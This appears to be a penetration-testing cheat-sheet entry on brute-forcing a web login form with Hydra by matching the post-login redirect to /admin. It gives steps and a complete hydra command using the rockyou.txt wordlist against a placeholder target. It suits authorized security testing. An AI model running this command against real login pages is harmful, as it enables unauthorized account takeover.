← Back to search

Login Brute Force with Success Match (Hydra)

credentialstool

Summary

Brute-forces a login form using a success condition (S=) instead of a failure string, matching the post-login redirect to /admin.

Walkthrough

Use Hydra with a success match when the failure response is hard to fingerprint but a successful login produces a known redirect.

Steps

  • Capture a valid authenticity_token (CSRF token) and place it in the request body.
  • Identify what a successful login returns (here a redirect to /admin) and pass it with S=.
  • Run with -l for the user and -P rockyou.txt for the password list.

Commands

bash

hydra -l admin -P rockyou.txt <TARGET> http-post-form "/admin/login:authenticity_token=TOKEN&user[username]=^USER^&user[password]=^PASS^:S=/admin"